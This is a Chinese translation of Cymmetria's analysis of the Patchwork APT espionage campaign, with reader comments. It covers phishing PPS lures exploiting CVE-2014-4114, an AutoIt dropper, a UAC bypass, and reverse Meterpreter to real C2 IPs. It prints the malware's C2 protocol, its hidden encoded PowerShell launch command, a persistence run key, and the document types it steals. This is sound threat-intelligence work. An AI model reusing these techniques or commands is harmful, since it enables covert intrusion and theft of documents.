揭秘Patchwork APT攻擊 ：一個與中國南海和東南亞問題相關的網絡攻擊組織 20160711

最近，一個與東南亞和中國南海問題相關的APT攻擊被發現，該APT攻擊以包括美國在内的各國政府和公司為目标 。經安全專家分析，該APT攻擊所使用的全部工具代碼都是通過 複制-粘貼 網際網路公開代碼組合而成，相對于其它APT特有的攻擊工具而言，比較獨特。

Cymmetria發現并釋出了此APT攻擊的分析報告，由于其代碼來源于多個網絡論壇和網站，如Github、暗網和隐秘的犯罪論壇等，故把其命名為Patchwork APT 攻擊（Patchwork：拼湊物）。

一、報告綜述

Patchwork APT自2015年12月被監測到之後，目前已經感染了大約2500台電腦，雖有迹象表明其最早活動可追溯至2014年，但Cymmetria并未第一時間發現。

Patchwork APT針對的目标是軍事和政治機構，特别是那些與東南亞和南海問題相關的工作機構雇員，目标多是政府或與政府有間接聯系的機構。

在存活的受害者系統上，Patchwork APT通過搜尋文檔并上傳至其C&C伺服器，如果目标主機非常有價值，Patchwork APT還會進一步安裝第二階段滲透工具。

以下為PatchworkAPT 的攻擊時間範圍：

二、調查

1 概述

該APT攻擊于今年5月在針對歐洲政府部門的一起釣魚活動中被發現，攻擊目标為一個中國政策研究機構的從業人員，其以PPT文檔為誘餌發起網絡攻擊，文檔内容為中國在南海的一系列活動。

當PPT文檔被打開後，嵌入執行CVE-2014-4114漏洞代碼，這個漏洞存在于未打更新檔的 Office PowerPoint 2003 和2007中，漏洞利用代碼曾被發起了名為 Sandworm的APT 攻擊。

一旦漏洞代碼開始執行，第一階段為部署攻擊載體：一個利用AutoIt工具編譯的腳本。這個腳本使用某網絡論壇出現的名為UACME方法和代碼來繞過系統UAC。

獲得更高權限之後，以Meterpreter方式執行powersploit 腳本，（Meterpreter是著名的metasploit架構遠控工具）

下一階段，開始對文檔和目标主機價值進行篩選判斷，如果目标足夠有價值，攻擊者再次部署第二階段攻擊子產品，涉及到的攻擊工具也大多來源于知名論壇或網絡資源。以下為其攻擊感染流程：

2 以蜜罐方式發現攻擊者

為了捕獲攻擊者發起的第二階段攻擊程式，觀察其在内網中的滲透活動，我們建立了一個真實網絡環境，這個環境讓攻擊者覺得他們已經成功擷取了主機權限。

零星的誘餌資料可以讓攻擊者向另一主機轉移，這些資料可以是存儲憑據，共享檔案夾、浏覽器cookies，VPN配置等其它資訊。最終我們利用了Cymmetria’s MazeRunner 系統成功捕獲了攻擊者的活動。

3 開始

如前所述，為了保證攻擊者的攻擊持續處于活動狀态，我們虛構了對攻擊者來說非常感興趣的目标：一位處理安全問題的政府智庫人員。

建立欺騙網絡

• 首先，建立SMB共享，映射到目标電腦并顯示網絡備份；

• 其次，把一個運作雲端服務的RDP憑據存放于電腦中，同時在遠端雲端系統中部署欺騙資料，形成蜜罐系統，同時造成正常服務的假象。

蜜罐檔案系統

用 RDP憑據引向蜜罐系統

4 一連串的事件

（1） 當一個 PowerPoint PPS檔案被打開之後，釋放有效攻擊載荷。即CVE-2014-4114漏洞利用代碼（曾用作SandWorm沙蟲攻擊）。

釋放的Driver.inf 檔案内容

（2）  主機被以下可執行檔案感染：

         • sysvolinfo.exe   – 執行編譯腳本.

        • PowerShell 以 HTTPS Meterpreter方式執行攻擊腳本 ,同時保持與C2控制伺服器連接配接，發起以下網絡請求：

    http://212.129.13.110/dropper.php?profile=<base64of [[email protected]]> 

    https://45.43.192.172:8443/OxGN 
      

（3）  目标電腦上的檔案被攻擊者以加密通道方式上傳至遠端控制伺服器，由于Meterpreter的“sstagerverifysslcert”功能 開啟，是以我們沒有檢測到相應的SSL通道；

（4） 攻擊者釋放第二階段惡意軟體7zip.exe，利用此程式掃描硬碟并連接配接遠端IP位址  212.83.191.156。

（5）7zip.exe複制自身在C:\Windows\SysWOW64\目錄下生成netvmon.exe檔案，并添加程序式自啟動路徑，實作長期控制目的。

（6）在最初感染的前三天，攻擊者開始對SMB共享檔案夾發起通路；

（7）惡意軟體開始通路映射共享，并掃描所有固定磁盤驅動器上的檔案；

（8）在MazeRunner 系統的第一個警報産生之後，由于誘餌系統的IP位址被内置在RDP憑據檔案裡，是以，我們看到了攻擊者試圖利用RDP憑據連接配接誘餌系統的資料。警報提示攻擊發起于

IP 212.129.7.146，整個攻擊持續了12分鐘；

（9）從我們收到Mazerunner的警報綜合受害主機内的RDP連接配接檔案表明，攻擊者登入失敗了幾次，但讓我們感興趣的是，攻擊者并沒有使用系統密碼擷取工具Mimikatz。

（10）我們相信以上兩起攻擊連接配接發起于同一個攻擊源，因為：

           • 攻擊者用來連接配接我們蜜罐系統的兩個IP位址都屬于rev.poneytelecom.euf 域名；

          •  内部警報表明，兩起攻擊連接配接事件發生在同一天。

攻擊發起的網絡規劃圖

5 從攻擊者C&C控制伺服器中獲得的資訊

 我們通過另一個合作夥伴，成功地接手并控制了攻擊者的一個C&C伺服器，伺服器中包含了大量檔案：

•  種類多樣的PPS檔案–用作釣魚攻擊的惡意檔案

•  大量的惡意代碼包

而且這些釣魚檔案内容都與中國主題或色情性質相關，以下是一些樣本檔案：

在C&C伺服器中，我們還提取到了PPS檔案的修改日期，這些日期從2015年12月持續到2016年1月。從日期上可以清晰看出攻擊者準備和實施攻擊的時間線。

三、技術分析

工具部署

攻擊載體：

攻擊載體是一個以PPS為附件的網絡釣魚郵件，嵌入漏洞 CVE-2014-4114  的利用代碼。漏洞利用代碼執行之後釋放可執行檔案和Windows驅動程式描述檔案INF。

攻擊者把以下兩個檔案嵌入OLE實體中并釋放到受害者主機：

   •  Driver.inf



   •  Sysvolinfo.exe
      

DROPPER木馬程式：

sysvolinfo.exe程式是攻擊者第一階段的有效載荷（另一個程式是uplv1032 .exe），其目的是為了提升權限、篩選資料，從網絡下載下傳執行powersploit發起的程式和指令。通過安裝Meterpreter，攻擊者可以在受感染主機内發起遠端控制指令。

sysvolinfo.exe代碼本身是利用編譯工具AutoIt編譯的，其代碼的一個重要部分抄襲于黑客論壇“ indetectables ”。

C&C通信：

當黑客工具開始運作之後，第一步就是與C&C伺服器進行确認連接配接，靜待指令，以下就是對C&C連接配接協定的分析：

屬性: 

ComputerID=BASE64ENCODE(“[email protected]$COMPUTERNAME”) 

ddager= Isstartup registry key added (Bool) 

r1=BASE64ENCODE(result of OSVersion macro, e.g. WIN_7) 

r2=BASE64ENCODE(result of OSArch macro, e.g. X64) 

r3=BASE64ENCODE(trojan version,  in our sample) 

r4=BASE64ENCODE(Does the SQLite database folder ( @UserProfileDir &“\AppData\Local\Google\Chrome\User Data\Default\”) exist () or not ()) 

r5=BASE64ENCODE(stdout of last cmd command) 

r6=BASE64ENCODE( if running as administrator,  if not)
      

發起遠端連接配接請求：

  --  http://212.129.13.110/dropper.php?profile=+ $ComputerID
           

用以下變量作為發送參數：

 傳回變量和結果：

 --  “$sdata|$payload”
           

可用指令解釋：

Command ID	Command explanation
“1”	調試伺服器遠端狀态如 “[+] ServFlag : Disabled” ，也可以什麼都不做
“2”	如果此指令在之前沒被執行過, 以PowerShell腳本方式執行： powershell -nop -wind hidden -noni -enc ” & $PAYLOAD
“3”	重置腳本内部狀态，忽略先前執行的“2”号指令，再次執行“2”号指令。
“4”	退出腳本
“5”	以base64加密payload執行_emorhc function
“6”	以base64加密payload為變量執行_getnewver function
“7”	以base64加密payload為變量執行_instcust function
“8”	通過CMD方式執行base64加密payload ，把結果儲存于r5

當受害主機狀态指令發送到控制伺服器後，黑客程式繼續以“TotalSecurity”字元串目标掃描整個“Program Files”目錄，這是“360 Total Security”安全軟體的安裝目錄。(360 Total Security 是360的國際版）

黑客軟體以”Baidu Software Update”為檔案夾僞裝自身進入系統啟動目錄（HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run）。然後，它又向控制伺服器發送另一個指令，之後，開始掃描計算機中的所有固定驅動器磁盤，以尋找以下字尾名檔案：

*.doc

*.pdf

*.csv

*.ppt

*.docx

*.pst

*.xls

*.xlsx

*.pptx 
      

 之後上傳所有檔案至伺服器：

在對黑客工具進行反編譯後，發現了其功能調用中包含了一個有趣的PDB檔案：

提權操作:

經過前階段描述可知，攻擊載體使用了WINDOWS7系統中尚未打更新檔的UAC繞過漏洞（被稱為UACME ），這可以讓攻擊者以管理者身份執行操作。

shellcode執行:

當AutoIt 腳本惡意軟體從 $sdata 中接收到“2”号指令的心跳後（這似乎是最常見的情況），便以base64加密方式執行指令：

 powershell -nop -wind hidden -noni -enc 
           

我們觀察到base64加密的payload是powershell腳本方式的shellcode，通過Meterpreter 進行https反向遠端連接配接。

 反向HTTPS Meterpreter 連接配接：

AutoIt腳本提權并執行一個PowerShell的反向Meterpreter 連接配接腳本，而且這個腳本看起來是通過一個線上部落格複制而來的

Meterpreter用以下參數進行連接配接：

       • LHOST=45.43.192.172

       • LPORT=8443 
      

第二階段的攻擊載體：

該階段的攻擊工具隻有在攻擊者執行Meterpreter連接配接，并确定目标主機具有價值之後，才會運作部署。我們發現這個攻擊載體為7zip.exe，但它有時候也為ndcrypt.exe和nd.exe。

7zip.exe 16 進制代碼

這個程式的很多代碼都來源于GitHub的一個公開代碼庫 。

脫殼之後，程式子產品執行以下動作：

（1）為了在電腦關機或重新開機之後能繼續保持入侵狀态，攻擊載體程式在系統目錄下複制自身并重命名為netmon.exe，并以自啟動服務 Net Monitor 運作。

                       C:\Windows\SysWOW64\netmon.exe     — 以 7zip.exe/netmon.exe 運作的64位程式；

（2）執行一個固定磁盤的掃描線程和檔案篩選程式（但不會搜尋網絡驅動器和USB裝置）

          • 另一個線程執行檔案上傳功能：         

         • 另一個線程下載下傳可執行檔案：

四、其它屬性

1 PPS檔案時間編輯分析：

 經過對PPS檔案的提取分析發現，這些PPS檔案在一天當中的不同時段都被經過修改：

2 C&C 遠端控制伺服器活動時間：

C&C伺服器的活動不僅在于單獨的幾個小時之間，還在于每周的每天，通過對每天的時間區間進行描述之後，我們可以發現不同的模式，例如，每周的周日活動較多，周六較少。另外，攻擊活動不早于淩晨2點，不晚于上午11點，除了某個周日之外。“攻擊工作時間”圖如下：

3 域名注冊時間：

攻擊活動使用的惡意域名注冊時間隻在每周的特定幾天，而且注冊時間都介于淩晨3點到下午15點之間：

五、總結：

Patchwork APT 是一個非常成功的有針對性的網絡攻擊，令人驚訝的是自去年12月之前，它一直未被發現。

其高度複雜的操作與其具有的低技術含量形成鮮明的沖突對比，避免昂貴的開發工具而選擇開源低廉的代碼作為滲透工具，這也許是一種攻擊趨勢，也是一種避免被發現的手段；

根據我們所掌握的資訊，攻擊者有可能是親印度或印度人。但就像我們的CEO Gadi Gadi Evron在内部讨論時所說的：“也有另一種可能性，有可能是其他僞裝成印度人的攻擊者，因為在網絡世界裡，好像根本就沒有任何确切的證據來支撐說明，這隻是我們自己的觀點。”

不像其它國家發起的APT攻擊，印度的網絡間諜活動一直都處于平靜狀态，如果攻擊者确實是親印度或印度人，那麼這是非常值得注意的情況。

卡巴斯基實驗室中文報告

卡巴斯基實驗室英文報告

***** 文章根據Cymmetria 報告原文編譯：Cymmetria - Unveiling_Patchwork

*****後記：在Cymmetria釋出分析報告的同時，卡巴斯基實驗室也釋出了名為《Dropping Elephant網絡犯罪組織肆意攻擊多國政府和外交機構》的報告，報告中命名的Dropping Elephant APT 與Cymmetria發現的 Patchwork APT 高度相似。

*本文譯者：clouds，轉載須注明來自FreeBuf黑客與極客（FreeBuf.COM）

收藏該文

clouds9篇文章等級：4級

獨立網絡安全研究員

個人首頁  發私信

• 上一篇：RDP連接配接降級攻擊以及規避方法解析
• 下一篇：不解密資料竟也能識别TLS加密的惡意流量？

這些評論亮了

• 

  xxx 回複 http://cn.technode.com/post/2014-08-14/tcbj-coin/ ，百度了一下系統使用者名，好像也是印度人 ) 7 ( 亮了

• 

  Anonymous某 (1級) 回複 翻譯有誤，是通過PowerShell腳本加載起Meterpreter而不是Meterpreter加載Powershel腳本l ) 7 ( 亮了

• 

  Anonymous某 (1級) 回複 原文為

  This PowerShell script executed an additional payload, which was a PowerSploit script used to invoke shellcode containing a reverse HTTPS Meterpreter. ) 7 ( 亮了

• 

  clouds (4級) 獨立網絡安全研究員 回複 @ Anonymous某  SORRY ,謝謝提醒，修訂為“ 這個PowerShell腳本還執行了另外一個由Meterpreter https連接配接的包含有shellcode的payload” ) 7 ( 亮了

• 

  taylorwin (5級) 回複 好玩 ) 7 ( 亮了

發表評論

已有 7 條評論

• 

  ArthurKiller  (5級) FreeBuf的隔壁鄰居------老王  2016-07-11 回複 1樓

  我們通過另一個合作夥伴，成功地接手并控制了攻擊者的一個C&C伺服器

  事實證明，從伺服器廠商租用伺服器做C&C都是不靠譜的，還是黑服靠譜。

  但好奇的是APT攻擊者到底是誰？還有研究人員好會玩心計，搞台蜜罐給人家。。。。

  亮了( 6)

  • 

    taylorwin  (5級)  2016-07-11 回複

    好玩

    亮了( 7)

• 

  xxx  2016-07-11 回複 2樓

  http://cn.technode.com/post/2014-08-14/tcbj-coin/ ，百度了一下系統使用者名，好像也是印度人

  亮了( 7)

• 

  Anonymous某  (1級)  2016-07-11 回複 3樓

  翻譯有誤，是通過PowerShell腳本加載起Meterpreter而不是Meterpreter加載Powershel腳本l

  亮了( 7)

  • 

    Anonymous某  (1級)  2016-07-11 回複

    原文為

    This PowerShell script executed an additional payload, which was a PowerSploit script used to invoke shellcode containing a reverse HTTPS Meterpreter.

    亮了( 7)

    • 

      clouds  (4級) 獨立網絡安全研究員  2016-07-11 回複

      @ Anonymous某  SORRY ,謝謝提醒，修訂為“ 這個PowerShell腳本還執行了另外一個由Meterpreter https連接配接的包含有shellcode的payload”

      亮了( 7)

• 

  Asiaidc.net  (1級) 亞洲資料中心 - 夢想無界, 關聯未來  2016-07-15 回複 4樓

  攻擊看上去的确非常的複雜。